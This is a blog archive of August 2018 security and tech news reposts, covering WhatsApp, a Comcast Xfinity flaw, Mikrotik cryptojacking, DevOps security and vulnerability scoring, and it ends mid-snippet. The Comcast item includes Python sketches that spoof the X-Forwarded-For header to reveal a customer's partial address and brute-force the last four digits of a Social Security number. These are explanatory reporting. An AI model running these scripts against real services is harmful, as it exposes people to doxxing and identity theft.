Monthly Archives: August 2018

WhatsApp now allows group voice and video calls between up to 4 people

WhatsApp has added a much-requested new feature after it began to allow users to make group voice and video calls.

It’s been just over three years since the Facebook-owned company introduced voice calls, and a video option followed a year later. Today, WhatsApp counts over 1.5 billion monthly users, and it says they make over two billion minutes of calls via its service each day.

Starting this week, callers can now add friends by hitting the “add participant” button which appears in the top right corner of their screen. The maximum number of participants is four and, impressively, WhatsApp said the calls are end-to-end encrypted.

That’s not an easy thing to do. Telegram, a self-professed secure messaging app, hasn’t even gotten around to encrypting its group messaging chats, let alone group calls.

On the encryption side, WhatsApp has long worked with WhisperSystems to shield all messages and calls on its platform from prying eyes and ears. That said, the relationship between the two became a little more complicated this year when WhatsApp co-founder Brian Acton donated $50 million of his wealth — accumulated from Facebook’s acquisition of his company in 2014 — to the Signal Foundation, which is associated with WhisperSystems.

Acton quit Facebook last year — this year he encouraged people to delete the social network for its data and privacy screw-ups — while his fellow WhatsApp co-founder Jan Koum joined him in departing in May of this year.

Like Acton, Koum was apparently irked by scandals such as Cambridge Analytica, although his on record explanation for quitting was to “do things I enjoy outside of technology, such as collecting rare air-cooled Porsches, working on my cars and playing ultimate frisbee.” Each to their own.

 

via:  techcrunch

Flaw exposed Comcast Xfinity customers’ partial home addresses and SSNs

Poor security measures have reportedly put the personal details of Comcast Xfinity customers at risk, a researcher has revealed.

According to a BuzzFeed News report, security researcher Ryan Stevenson found a vulnerability in the high-speed ISP’s online customer portal that could allow unauthorised parties to determine the partial home address of customers.

The flaw was found in the “in-home authentication” webpage that customers could use to access their Comcast Xfinity bills without the hassle of logging in.

In-home authentication (also known as Home-Based Authentication, HBA, or IP authentication) is supposed to reduce friction for customers attempting to access their accounts and cut down on the number of password resets requested.

The webpage asked users to verify their accounts by choosing their correct home address from a displayed list of four partial home addresses.

Choose the correct address, and you gain access to the billing account.

How does Comcast Xfinity know which is your correct home address? By looking at the webpage visitor’s IP address.

But therein lies the problem. Stevenson was able to spoof a customer’s IP address and trick Comcast by changing the X-Forwarded-For header in his requests.

Then, by repeatedly refreshing the login page, three of the suggested partial home addresses would change – and only one would stay the same, the correct one belonging to the targeted customer.

An attacker would now know the first digit of the customer’s street number and the first three letters of the street where they lived with asterisks hiding all other characters.
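To illustrate the technique, here is a rough Python sketch of how such a lookup could be automated. The endpoint URL, the victim’s IP address, and the HTML parsing are hypothetical stand-ins; none of these details come from the report.

```python
import re
from collections import Counter

import requests

# Hypothetical endpoint, victim IP, and HTML layout -- the report does not
# publish these details, so they are stand-ins for illustration only.
AUTH_URL = "https://isp.example/in-home-auth"
VICTIM_IP = "203.0.113.45"

def parse_address_choices(html):
    # Stand-in parser: assume the four partial addresses appear in elements
    # like <label class="address">1*** Mai***** St</label>.
    return re.findall(r'<label class="address">([^<]+)</label>', html)

counts = Counter()
for _ in range(10):
    # Pretend to be the victim by setting the X-Forwarded-For header, then
    # reload the page and record which partial addresses are offered.
    resp = requests.get(AUTH_URL, headers={"X-Forwarded-For": VICTIM_IP})
    counts.update(parse_address_choices(resp.text))

# The three decoy addresses change on every refresh; the one present in every
# response is the targeted customer's real partial home address.
print([addr for addr, n in counts.items() if n == 10])
```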

As BuzzFeed News explains, it would then be possible for a malicious hacker to determine the customer’s city, state, and postal code for the partial address by using an IP lookup website.

It’s easy to imagine how an individual might be targeted using the technique, as an IP address is shared with any website an internet user visits. If a malicious actor wanted to determine a particular Xfinity customer’s home address, they might even simply send their target a link to a webpage under their control or embed a tracking pixel inside an HTML message with the specific intention of capturing an IP address.

But the story doesn’t end there, as Stevenson also found another security hole in Comcast Xfinity’s systems – specifically a sign-up page for authorized dealers. The webpage was vulnerable to hackers attempting to brute-force a customer’s Social Security number.

A form on the page requested the customer’s home address to be entered (perhaps determined using the technique described above) along with the last four digits of the customer’s Social Security Number.

In a huge blunder, the webpage allowed an unlimited number of attempts to get the last four digits of the social security number correct – meaning an attacker could simply write some code to automatically cycle through all the possibilities from 0000 to 9999 until hitting gold.
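To show why unlimited attempts are such a blunder, here is a minimal sketch of the enumeration; the URL, form fields, and success check are invented for illustration and do not come from the report.

```python
import requests

# Invented URL, field names, and success marker -- none of these come from
# the report; the point is simply that 10,000 guesses are trivial to make
# when the form never locks you out.
SIGNUP_URL = "https://isp.example/dealer-signup"
HOME_ADDRESS = "1*** Mai***** St, Anytown, CA 90210"

for guess in (f"{n:04d}" for n in range(10_000)):
    resp = requests.post(SIGNUP_URL, data={"address": HOME_ADDRESS, "ssn_last4": guess})
    if "verification successful" in resp.text.lower():   # assumed success marker
        print("Last four digits:", guess)
        break
```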

Comcast responded to the report of the vulnerabilities from BuzzFeed News, patching quickly to avoid the security holes being exploited by others in the future:

“We quickly investigated these issues and within hours we blocked both vulnerabilities, eliminating the ability to conduct the actions described by these researchers. We take our customers’ security very seriously, and we have no reason to believe these vulnerabilities were ever used against Comcast customers outside of the research described in this report.”


via:  tripwire

Many Developers Have Yet to Take Responsibility for Code Security, Reveals DevOps Study

A DevOps survey revealed that many developers have yet to take responsibility for the security of the code they produce.

According to Checkmarx’s report, “Managing Software Exposure: Time to Fully Embed Security into Your Application Lifecycle,” 93 percent of respondents said it’s either highly desirable or desirable that developers take responsibility for the security of the code they produce. But many developers aren’t living up to this ownership. Just 51 percent of respondents reported that their developers shoulder this duty. Forty-one percent of participants revealed this issue is addressed quite poorly or not at all at their organization.

Feeding this challenge could be a lack of training among developers on how to produce secure code. Nearly all (96 percent) respondents emphasized the importance of this training. But less than half said it’s being appropriately addressed at their workplace. Meanwhile, 49 percent of participants asserted that this training is not receiving the focus it deserves.

For its report, Checkmarx surveyed 183 individuals who hold IT, security and software development titles at organizations worldwide. Their responses help illustrate some of the challenges involved with injecting security into the DevOps cycle.

One of the obstacles uncovered in the study is the fact that software security is still overlooked by many boards. More than half (57 percent) of respondents said that software security now warrants a boardroom-level discussion. But 45 percent said it’s hard to get executives’ buy-in for this issue.

Another challenge revealed in the report is that developers and operations personnel are still struggling to make a cohesive DevOps culture. Seventy-two percent of survey participants said as much when they admitted that different teams within IT are still reluctant to trust one another.

It’s important that organizations consider all these issues of merging DevOps with security going forward. But Checkmarx has a recommendation for what should be a priority:

The reality is that in order to prevent potential software exposure throughout the software development lifecycle, we must first tackle the issue of ownership and responsibility, bringing together employees of diverse skill levels and backgrounds to help inspire more mutual trust and respect.


via:  tripwire

Microsoft launches undersea, free-cooling data center

Underwater data centers offer the benefit of free water cooling, plus they bring the ultimate in edge computing — placed in open water, close to the population, and rent free.


A free supply of already-cooled deep-sea water is among the benefits of locating pre-packaged data centers underwater, believes Microsoft, which recently announced the successful launch of a submarine-like data center off the coast of the Orkney Islands in Scotland.

The shipping-container-sized, self-contained server room, called Project Natick, was submerged earlier this month on a rock shelf 117 feet below the water’s surface. It also has the benefit of potentially taking advantage of bargain-basement real estate near population centers — there’s no rent in the open sea.

“Project Natick is an out-of-the-box idea to accommodate exponential growth in demand for cloud computing infrastructure near population centers,” John Roach writes on Microsoft’s website.

Microsoft is implementing its sunken project in cold North Sea water off Scotland, which isn’t a population-dense area. If the concept proves successful, there’s no reason similar tube-like structures couldn’t be slid, rent-free, into water anywhere land values are high, and where end-user edge-computing is required.

Seawater for cooling is on-trend. It’s been used for years in power generation, but it is being used increasingly in data centers. The on-land, 75-hall Lefdal Mine Datacenter, built underground beneath a mountain in Norway, sits next to a “deep, cold fjord,” the former mine’s website explains. That’s good not only for carbon-neutral hydroelectric power, but also for cooling, it reckons.


Cold seawater is the cooling source for the highly secure location, Lefdal says. Forty-six degree Fahrenheit water is fed into the fjord by four glaciers. And with the data center built below sea level, no energy is used to raise the already-chilled water. Seawater cools the halls’ water circuit from 86 degrees to 64 degrees Fahrenheit.

“The most joyful moment of the day was when the data center finally slipped beneath the surface on its slow, carefully scripted journey,” Ben Cutler, a manager on Microsoft’s undersea project, is quoted as saying of the Natick launch by Roach. It wasn’t easy, in other words: a cable carrying internet connectivity and power, laid earlier, had to be recovered from the sea floor using a remotely operated device. Ten winches, a barge, and a crane were then used to perform the offshore dive.

Help from the European Marine Energy Centre

It’s not a coincidence that Natick, off Orkney, is also the site of the European Marine Energy Centre (EMEC). The wave-energy test center wasn’t conceived as a data center solution provider, but it has become a resource provider for Microsoft: it hauled Natick into place and has provided connections. The group believes its wave-energy resources are just as suitable for data centers.

“We have cables in the sea [there] just waiting for people to be ready to connect their devices that can transmit the necessary power and data to and from the shore,” says Neil Kermode, the group’s managing director, in a blog post.

“More than half of the world’s population lives within about 120 miles of the coast,” Roach says in the Microsoft article. “By putting data centers in bodies of water near coastal cities, data would have a short distance to travel to reach coastal communities, leading to fast and smooth web surfing, video streaming and game playing, as well as authentic experiences for AI-driven technologies.”

 

via:  networkworld

Routers turned into zombie cryptojackers – is yours one of them?

We’ll start this story right at the end:

  • Users and sysadmins. Patch early, patch often.
  • Vendors and programmers. Don’t store plaintext passwords.

In this particular case, the vulnerable devices under attack are Mikrotik routers that haven’t been patched since April 2018.

Security researcher Simon Kenin at Trustwave pieced the story together, following reports that there seemed to be a surge of web-based cryptojacking in Brazil.

Kenin quickly realised that Brazil was something of a red herring in the story, because the attack was happening wherever the crooks could find unpatched Mikrotik routers.

Brazil just happened to be where the story broke – it is, after all, the fifth most populous country in the world, so there are a lot of Brazilian home and small business networks for crooks to find and attack.

Here’s how this cryptojacking attack seems to have gone down.

Back in April 2018, Mikrotik patched a remote access vulnerability in its products.

As far as we can tell, Mikrotik discovered the security flaw itself, describing it in basic terms as a vulnerability that “allowed a special tool to connect to the [administration] port, and request the system user database file.”

As it turned out, there was a bit more to it than that – the bug allowed any file to be read off the router, effectively giving crooks who knew the trick the opportunity to leech any data they wanted.

The user database file just happened to be the crown jewels, because Mikrotik had stored both usernames and passwords in plaintext.

As any regular Naked Security reader will know, you almost never [*] need to store passwords in a way that they can be recovered.

You can verify that a supplied password is correct by matching it against a database entry computed from the password using a cryptographic technique known colloquially as salt-hash-stretch.

You calculate forwards from the supplied password to get a unique “match string” to confirm the password, but because of how the salt-hash-stretch algorithm works, you can’t go backwards from the match string to work out anything about the password from which it was computed.

Simply put, you hardly ever [*] need to store actual passwords in files on disk, or even to store encrypted versions of passwords that can be unscrambled on demand.

That’s because you typically only need to check that a password was correct, not to record permanently what it was.
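As a minimal sketch of the idea, here is what salt-hash-stretch storage and verification could look like in Python, using the standard library’s PBKDF2 routine (one common stretching construction; bcrypt, scrypt and Argon2 are alternatives):

```python
import hashlib
import hmac
import os

# A minimal sketch of salt-hash-stretch password storage using PBKDF2.

def store_password(password: str):
    salt = os.urandom(16)                              # unique random salt per user
    match_string = hashlib.pbkdf2_hmac(
        "sha256", password.encode(), salt, 200_000     # the "stretch": many iterations
    )
    return salt, match_string                          # store these, never the password itself

def verify_password(password: str, salt: bytes, match_string: bytes) -> bool:
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 200_000)
    # You can compute forwards from a supplied password to the match string,
    # but not backwards from the match string to the password.
    return hmac.compare_digest(candidate, match_string)

salt, stored = store_password("correct horse battery staple")
print(verify_password("correct horse battery staple", salt, stored))   # True
print(verify_password("letmein", salt, stored))                        # False
```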

Sure, the crooks aren’t supposed to be able to steal your user database file in the first place, but there’s no point in turning that file into an instant password giveaway if it does get stolen.

How the bug was weaponised

Unfortunately, perhaps, a pair of security researchers going by @n0p and @yalpanian took Mikrotik’s patch and reverse-engineered it to recover the bug it was supposed to fix.

They subsequently published a proof-of-concept exploit, written in Python, that showed how to use the recovered flaw to extract the admin password from an unpatched Mikrotik router.

Exploits of this sort are sometimes considered to be “mostly harmless”, assuming that the exploit comes out after there’s been time to apply the patch.

In practice, of course, patches are often ignored for weeks or months, so that proof-of-concept exploits are also warmly welcomed by cybercrooks.

Anyway, the crooks in this cryptojacking saga seem to be using the Mikrotik admin-port attack vector (we have no idea if they actually started with n0p’s proof-of-concept or figured it out for themselves) to do their dirty work.

Sneakily, this particular router takeover didn’t require any code hacking or low-level network trickery.

According to Kenin, the crooks simply replaced a file called error.html, transmitted by Mikrotik’s built-in web proxy whenever there’s an HTTP error, with a web page that loads the CoinHive browser-based cryptomining software.

In other words, if you’re at a coffee shop where the owner has an unpatched Mikrotik router and has configured it to push all HTTP traffic through the web proxy, you’ll end up cryptomining on behalf of the crooks every time there’s a browsing problem.

Silently redirecting all web traffic in this way is known as transparent proxying. It’s not unusual on free shared networks such as coffee shops, trains, airports and so on. Often, the network operator isn’t trying to spy on you, or to censor your browsing. The goal is simply to block access to sites that eat a lot of bandwidth a lot of the time, such as video streaming or gaming servers. This helps to spread the available bandwidth a bit more fairly amongst all users.

Will the crooks get rich?

We doubt that the crooks will make much money here, so we’re hoping that their enthusiasm for this sort of attack will wane pretty quickly.

You’ll only get cryptojacked if you are browsing via the Mikrotik proxy; the cryptojacking will only kick off when there’s an error to report; and the cryptomining will only last until you exit from the browser tab with the cryptomining code in it.

You’re very likely to notice the cryptojacking, not least because your computer will slow down as its processors dedicate themselves to cryptomining.

If you have a laptop with cooling fans, you’ll probably hear them kick in at full throttle to deal with the heat generated by the cryptojacking.

Also, Mikrotik’s proxy only supports HTTP, not HTTPS.

Transparent proxies can’t peek inside HTTPS traffic without your explicit agreement, because the data in an HTTPS session is encrypted by your browser and, by default, can only be decrypted when it reaches the web server at the other end of the link.

So if you stick to HTTPS you won’t be sending traffic through the router’s proxy anyway.

What to do?

If you have a Mikrotik router, you really do want to patch this hole.

Firstly, cryptojacking is bad in absolute terms, even if the crooks only do a tiny bit of it very occasionally.

Secondly, if cryptojackers can reconfigure your router this easily, other crooks could hack you, too, perhaps with more serious side-effects.

So, here are our two initial points again, with a bonus piece of advice for good measure:

  • Users and sysadmins: patch early, patch often. For better or for worse, patches may end up being the public documentation of how a security hole works – it’s usually much easier to go backwards from a patch to an exploit than to figure out the exploit from first principles. In other words, the longer you leave it before patching, the longer you give the crooks to work back from the fix to a viable attack.
  • Vendors and programmers: don’t store plaintext passwords. You almost never need to – you can store salted-hashed-and-stretched passwords instead so that a breach of your password database means the crooks still have plenty of work to do to figure out what passwords match which hashes. Users who change their passwords quickly will beat the crooks to it, and the old hashes will be useless.
  • Everyone on the internet: stick to HTTPS as much as you can. Why use HTTP, which makes it really easy for crooks to intercept, spy on and tamper with your browsing, when you can use HTTPS, which makes all of those things very much harder?

By the way, even if you don’t have any Mikrotik hardware, why not check your own router for an update – and why not do it today?

 

via:  nakedsecurity

Security as a Quality Gate for DevOps

It’s hardly a controversial statement to say that DevOps is changing the way that organizations build and deploy applications. There’s plenty of material, stories, whitepapers and whole companies that demonstrate this trend. There are, however, a couple of things that make a discussion about security and DevOps important.

First, while there are a lot of organizations that have adopted DevOps tools and processes, there are many, many more that haven’t. That means that there are a lot of organizations that will do so in the future. And where there is adoption, it’s not necessarily comprehensive. It may be that one group has done so, or that teams are using some tools, but not others. In other words, DevOps is still fundamentally an early-stage technological movement.

The second reason is that DevOps is set to transform security, and no one is quite sure what that means, though there are a lot of opinions on the topic. Given that context, what should we be doing to secure this brave new world? We should start by looking at the pervasive industry problems. It’s tempting to start any DevSecOps discussion with technology. There’s a lot of it, and there’s always something new. But DevOps is really about solving a business problem, and so we should stay a level above the technology, at least for a bit.

Problem 1: Unacceptable Risk

A typical DevOps lifecycle involves pre-deployment testing, but rarely scanning for risks such as vulnerabilities, misconfigurations and compliance. It’s important to talk about risk broadly because all of these elements are real and can have a real impact on an organization. It’s tempting to focus on vulnerabilities, and it’s tempting to state that they all need to be fixed, but the reality is that ‘risk’ is broad and acceptance is organizationally specific. If risks aren’t caught prior to deployment of images to production, then unacceptable risks are also deployed.

Problem 2: Vulnerable Repositories

If you really think about it, every incident starts with some change. That change may, however, occur outside of your organization. Vulnerabilities are discovered all the time, and when a new vulnerability is published, an asset that you previously counted as acceptably secure might suddenly change state (though nothing on the asset itself has changed). Container repositories suffer from the same issue. If you’ve got a collection of images stored for use, even if you assessed them when they were added to that repository, they might become vulnerable over time.

Problem 3: Production Assessment is Too Late

A totally valid response to the first problem might be to apply the information security tools you have today to DevOps. These are tools that were largely developed to secure servers, workstations, laptops and network devices. Repurposing them for DevOps often results in questions like “can we put <security agent> in the running containers” and “can I scan the running containers for vulnerabilities.” These are patently bad ideas: they are not sufficient and, perhaps more importantly, they are inefficient. Introducing security controls at the production end of the process, and then trying to address findings, is one way to create friction between DevOps and Security.

Driving Towards Solutions

It does no good to talk about problems without a discussion of the solutions. There are a number of requirements that apply here and it’s worthwhile to enumerate them.

PRE-DEPLOYMENT ASSESSMENTS

This is clearly a core requirement for any solution to the problems discussed above. Assessment must be done prior to pushing containers to production in order to catch risk before it’s exploitable.

INTEGRATION WITH DEVOPS TOOLS

In order to be effective in a DevOps environment, the solution must integrate with the tools that developers are already using. That means that it can’t require additional manual steps on a build-by-build basis, or that the developer go to a different tool to get results. DevOps is about velocity, so creating friction needs to be avoided.

ASSESSMENT SCOPE

Recall the difference between ‘vulnerabilities’ and ‘risk’ that was discussed above? It’s vital that the assessment provided actually identifies the risks that matter to your organization. There’s no such thing as a generic ‘security scan.’ There are scans for more specific risks, such as vulnerabilities, misconfigurations, and compliance. Leaving a risk out of the process means letting it into production.

ACCESSIBILITY

DevOps doesn’t usually happen in one team or one place (logical or geographical). When I say ‘accessibility,’ I mean the requirement that the technology and the people who need access to the solution can get it without substantially changing how they do their jobs. Part of the answer here is likely SaaS, but also elasticity to deal with the requirements of your business.

POLICY DRIVEN

Finally, risk is personal. A solution that finds all the bad things and then requires that you fix them all is simply insufficient. As a team or organization, you need to define what level of risk you’re willing to tolerate, and then you need to be able to instantiate that as the quality gate in the solution.
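As a rough illustration of such a quality gate, the sketch below fails a CI build when a scan report contains more risk than the team has agreed to tolerate. The report format, field names, and thresholds are assumptions, not any particular product’s output:

```python
import json
import sys

# A minimal sketch of a policy-driven quality gate: a build step that fails
# the pipeline when a (hypothetical) scan report holds more risk than the
# team has agreed to accept.
POLICY = {"critical": 0, "high": 0, "medium": 5}        # maximum allowed findings per severity

def gate(report_path: str) -> int:
    with open(report_path) as f:
        findings = json.load(f)                         # e.g. [{"id": "...", "severity": "high"}, ...]
    counts = {}
    for finding in findings:
        sev = finding["severity"].lower()
        counts[sev] = counts.get(sev, 0) + 1
    violations = {s: n for s, n in counts.items() if n > POLICY.get(s, 0)}
    if violations:
        print(f"Quality gate FAILED: {violations} exceed policy {POLICY}")
        return 1                                        # non-zero exit code fails the CI job
    print("Quality gate passed")
    return 0

if __name__ == "__main__":
    sys.exit(gate(sys.argv[1]))
```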

DevOps really is poised to change the security landscape. While there are bound to be more problems to solve that we haven’t discovered yet, there’s real work to be done here today. It’s not an impossible task, but it does take awareness and effort.

To learn more, Tripwire is hosting a special webcast on August 21 titled “Leading a DevOps Transformation.”

Join us and guest presenters to learn how to help your organization achieve higher levels of performance whilst ensuring security is a continuous aspect of the process.

You can register here!

 

via: tripwire

DevOps and Cloud – The Match that Drives Today’s Businesses

When concepts like DevOps and Cloud computing come together, this powerful combination propels organizational growth at a rapid speed.

Some trends in today’s industry have helped bring about the collaboration of these two most important change agents. Let’s take a look at them here:

  1. The world is witnessing an industry-wide shift wherein we are transitioning from a product-based economy to a service-based economy.
  2. The 21st century business environment demands that companies focus on agility & innovation rather than stability and efficiency.
  3. The digital dimension has drastically begun to influence the physical dimension.

Most organizations today are beginning to realize the potential of these business transformation agents. While DevOps is a more process-oriented concept, the cloud acts as a catalyst to pace up this process.


DEVOPS CLOUD BENEFITS

Cloud computing complements DevOps in that its flexibility makes room for experimentation within the DevOps process. The agility of cloud computing makes it an ideal partner to work with.

Operations-oriented companies use cloud computing to speed up the development process and to boost individual developers’ productivity and efficiency through cloud tools, application-specific infrastructure, and self-service catalogs.

With DevOps in the cloud, the two teams work together, understanding each other’s language, with developers teaching operations about code, operations teaching developers about infrastructure, and security woven throughout, leading to a close-knit circle of like-minded professionals.

The transformation from a product economy to a service economy, alongside data infusion, has turned software providers into customers who also use cloud services to provision software-as-a-service (SaaS).

New-generation apps need complex technology stacks that require great effort for creation and configuration. And thanks to the cloud, these development functions are performed in a matter of minutes or hours unlike earlier times when development activity took weeks or months.

SECURITY IN DEVOPS AND CLOUD

With many companies falling prey to hacking, it is crucial to implement security in the framework of your infrastructure.

And since DevOps and the cloud are the most utilized and most crucial platforms that drive business development, most IT professionals are incorporating security in these platforms.

DevOps professionals are embedding security as code (coming to be recognized as DevSecOps) into the DevOps framework so that future security breaches are avoided. In the cloud, meanwhile, most providers equip their applications, tools, and above all their infrastructure with security measures, giving customers the assurance of safe business operations. Even in the event of a security breach, options like business continuity and disaster recovery help you recover what matters the most.

HERE ARE SOME BEST PRACTICES OF DEVOPS IN THE CLOUD:
  • The DevOps team should develop a self-service approach, ensuring that the speed at which the cloud delivers is not undermined by the continuation of traditional practices.
  • DevOps automation should not just be a workflow element but rather become a culture that encourages everyone to identify roadblocks and look to eliminate them.
  • And lastly, measure every process to ensure its desired outcome.

WHAT ORGANIZATIONS NEED TO CONSIDER WHEN WORKING WITH DEVOPS IN THE CLOUD

DevOps is definitely a cultural transformation that is made better and achieved faster with assistance from the cloud, but not without organizational support. Secondly, while it is always attractive for DevOps teams to work with the latest technology or to opt for the cloud provider offering the best price, organizations need to weigh several internal factors before going ahead with cloud adoption.

Lastly, it is not DevOps vs. the cloud but rather a DevOps-cloud collaboration that drives the success of most 21st century businesses. DevOps tools alone may not be enough to meet the growing demands of a constantly changing market, but the cloud can be a wise solution for faster deployment of code and software development.

Also, Tripwire is hosting a special webcast on August 21 titled “Leading a DevOps Transformation.”

Join us and guest presenters to learn how to help your organization achieve higher levels of performance whilst ensuring security is a continuous aspect of the process.

You can register here!

 

via:   tripwire

Determining Importance with Objective Vulnerability Scoring

The holiday season is upon us, and nearly every day, my wife asks me what I want for Christmas. As a pop culture geek with interests in most fandoms, I have dozens of items that I could ask for, but the ultimate question is what do I really want to ask her to spend money on.

In a perfect and very geeky world, I would likely come up with a method of measuring my interests, but in reality, I’m ultimately going to just pick an item near and dear to my heart. That’s because our choices in situations like this tend to be subjective.

While these types of determinations of importance should be subjective, we often see subjective vulnerability scoring that should be objective. Systems like High, Medium, Low, and 1-5 are not objective and provide minimal value when prioritizing risk in your environment.

There are better ways to prioritize risk.

The most famous example would be CVSS, a system which is available in every vulnerability management solution. With CVSSv2, we saw vendors take their own twists on the calculation, sometimes adding their own scoring levels. We also saw instances where scores were calculated differently based on personal opinion. CVSSv3 has improved upon this with stricter definitions, but score generation still manages to be subjective as some definitions are ignored and redefined. At this time, however, it is the most accurate and valuable publicly available scoring system.
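For reference, the CVSSv3.0 base score is itself a fixed calculation once the metric values have been chosen; the subjectivity described above creeps in when analysts pick or redefine those metrics. A minimal sketch of the base score formula, using the published constants, looks like this:

```python
import math

# A simplified sketch of the CVSSv3.0 base score formula: the score is a
# fixed function of the chosen metric values.

AV = {"N": 0.85, "A": 0.62, "L": 0.55, "P": 0.20}          # Attack Vector
AC = {"L": 0.77, "H": 0.44}                                 # Attack Complexity
PR = {"N": 0.85, "L": 0.62, "H": 0.27}                      # Privileges Required (scope unchanged)
PR_CHANGED = {"N": 0.85, "L": 0.68, "H": 0.50}              # ... when scope is changed
UI = {"N": 0.85, "R": 0.62}                                 # User Interaction
CIA = {"H": 0.56, "L": 0.22, "N": 0.0}                      # C/I/A impact

def roundup(value: float) -> float:
    return math.ceil(value * 10) / 10

def base_score(av, ac, pr, ui, scope_changed, c, i, a):
    iss = 1 - (1 - CIA[c]) * (1 - CIA[i]) * (1 - CIA[a])
    if scope_changed:
        impact = 7.52 * (iss - 0.029) - 3.25 * (iss - 0.02) ** 15
        pr_val = PR_CHANGED[pr]
    else:
        impact = 6.42 * iss
        pr_val = PR[pr]
    exploitability = 8.22 * AV[av] * AC[ac] * pr_val * UI[ui]
    if impact <= 0:
        return 0.0
    score = impact + exploitability
    if scope_changed:
        score *= 1.08
    return roundup(min(score, 10))

# CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H -> 9.8, a classic "critical"
print(base_score("N", "L", "N", "N", False, "H", "H", "H"))
```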

The Tripwire IP360 Scoring System is as objective as they come and factors in all the criteria critical to your environment including vulnerability age, level of access, and ease of attack. It provides Tripwire IP360 users with a clearly defined prioritization that makes resolving vulnerabilities an objective process.

Should you require more for your environment, ASPL-Based Scoring allows customers to tweak the Tripwire IP360 scoring system while knowing that the foundation is still completely objective.

There are times when you need customization in your environment, but you should be allowed to determine where that customization occurs. If everyone else applies their own customizations (as seems to sometimes be the case with other popular scoring systems), it’s impossible to know if they make sense in your environment.

With ASPL-Based Scoring, Tripwire’s ASPL (content) packages contain our trusted, objective scoring while still allowing you the flexibility to know that critical issues in your environment are elevated with subtle tweaks to the Tripwire IP360 score of a specific vulnerability.

Don’t let your vulnerability management system provide you with a vulnerability prioritization similar to how you select a gift. Instead, rely on a scientific approach that gives clear, concise results every time.

Either way, use that prioritization to decide which issues to address first.

 

via:  tripwire

Cisco is buying Duo Security for $2.35B in cash

Cisco announced its intention to buy Ann Arbor, MI-based security firm Duo Security. Under the terms of the agreement, Cisco is paying $2.35 billion in cash and assumed equity awards for Duo.

Duo Security was founded in 2010 by Dug Song and Jonathan Oberheide and went on to raise $121.5 million through several rounds of funding. The company has 700 employees, with offices throughout the United States and in London, though it has remained headquartered in Ann Arbor.

Co-founder and CEO Dug Song will continue leading Duo as its General Manager and will join Cisco’s Networking and Security business led by EVP and GM David Goeckeler. Cisco in a statement said they value Michigan’s “resources, rich talent pool, and infrastructure,” and remain committed to Duo’s investment and presence in the Great Lakes State.

The acquisition feels like a good fit for Cisco. Duo’s security apparatus lets employees use their own device for adaptive authentication. Instead of issuing key fobs with security codes, Duo’s solution works securely with any device. And within Cisco’s environment, the technology should feel like a natural fit for CTOs looking for secure two-factor authentication.

“Our partnership is the product of the rapid evolution of the IT landscape alongside a modernizing workforce, which has completely changed how organizations must think about security,” said Dug Song, Duo Security’s co-founder and chief executive officer. “Cisco created the modern IT infrastructure, and together we will rapidly accelerate our mission of securing access for all users, with any device, connecting to any application, on any network. By joining forces with the world’s largest networking and enterprise security company, we have a unique opportunity to drive change at a massive scale, and reshape the industry.”

Over the last few years, Cisco has made several key acquisitions: OpenDNS, Sourcefire, Cloudlock, and now Duo. This latest deal is expected to close in the first quarter of Cisco’s fiscal year 2019.

 

via:  techcrunch

The Five Stages of Vulnerability Management

A key to having a good information security program within your organization is having a good vulnerability management program. Most, if not all, regulatory policies and information security frameworks advise having a strong vulnerability management program as one of the first things an organization should do when building their information security program.

The Center for Internet Security specifically lists it as number three in the Top 20 CIS Controls.

Over the years, I’ve seen a variety of vulnerability management programs and worked with many companies at various levels of maturity in their VM programs. This post will outline the five stages of maturity based on the Capability Maturity Model (CMM) and give you an idea of how to take your organization to the next level. To read the full whitepaper, check out this link.

What is the Capability Maturity Model?

The CMM is a model that helps develop and refine a process in an incremental and definable way. More information on the model can be found here. The five stages of the CMM are:

  1. Initial
  2. Managed
  3. Defined
  4. Quantitatively Managed
  5. Optimizing

Source: http://www.tutorialspoint.com/cmmi/cmmi-maturity-levels.htm

Stage 1: Initial

In the Initial stage of a vulnerability management program, there are generally no or minimal processes and procedures. The vulnerability scans are done by a third-party vendor as part of a penetration test or part of an external scan. These scans are typically done from one to four times per year at the request of an auditor or a regulatory requirement.

The vendor who does the audit will provide a report of the vulnerabilities within the organization. The organization will then typically remediate any Critical or High risks to ensure that they remain compliant. The remaining information gets filed away once a passing grade has been given.

As we’ve seen over the course of the last couple of years, security cannot just be treated as a compliance checkbox. If you are still in this stage, you are a prime target for an attacker. It would be wise to begin maturing a program if you haven’t started already.

Stage 2: Managed

In the Managed stage of a vulnerability management program, the vulnerability scanning is brought in-house. The organization defines a set of procedures for vulnerability scanning. They would purchase a vulnerability management solution and begin to scan on a weekly or monthly basis. Unauthenticated vulnerability scans are run, and the security administrators begin to see vulnerabilities from an exterior perspective.

Most organizations I see in this stage do not have support from their upper management, leaving them with a limited budget. This results in purchasing a relatively cheap solution or using a free open-source vulnerability scanner. While the lower-end solutions do provide a basic scan, they are limited in the reliability of their data collection, business context and automation.

Using a lower-end solution could prove to be problematic in a couple of different ways. The first is in the accuracy and prioritization of your vulnerability reporting. If you begin to send reports to your system administrators with a bunch of false positives, you will immediately lose their trust. They, like everyone else these days, are very busy and want to make sure they are maximizing their time effectively. A reliable and accurate report is critical to ensuring that remediation can occur in a timely manner.

The second problem is that even if you verify that the vulnerabilities are in fact real, how do you prioritize which ones should be fixed first? Most solutions offer a High/Medium/Low rating or a 1-10 score. With the limited resources system administrators have, they realistically can only fix a few vulnerabilities at a time. How do they know which 10 is the most urgent 10, or which High is the highest High? Without appropriate prioritization, this can be a daunting task. Granted, an industry standard such as CVSS is warranted as a common communication mechanism, but being able to prioritize on top of it provides tremendous value.

Stage 3: Defined

In the Defined stage of a vulnerability management program, the processes and procedures are well-characterized and are understood throughout the organization. The information security team has support from their executive management as well as trust from the system administrators.

At this point, the information security team has proven that the vulnerability management solution they chose is reliable and safe for scanning the organization’s network. As recommended by the Center for Internet Security, authenticated vulnerability scans are run on at least a weekly basis, with audience-specific reports delivered to various levels of the organization. The system administrators receive specific vulnerability reports, while management receives vulnerability risk trending reports.

Vulnerability management state data is shared with the rest of the information security ecosystem to provide actionable intelligence for the information security team. For example, if an exploit is detected at the external firewall, a quick correlation can be run in the Security Information and Event Management (SIEM) tool to identify which systems are vulnerable to that exploit.
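As a toy illustration of that kind of correlation, the sketch below matches a CVE flagged at the perimeter against (made-up) vulnerability scan state to list the hosts that are actually exposed:

```python
# Hosts, CVE IDs, and the data layout below are invented for illustration;
# in practice this lookup would run against your scanner's or SIEM's data.

scan_state = {
    "10.0.1.20": {"CVE-2018-7600", "CVE-2017-0144"},
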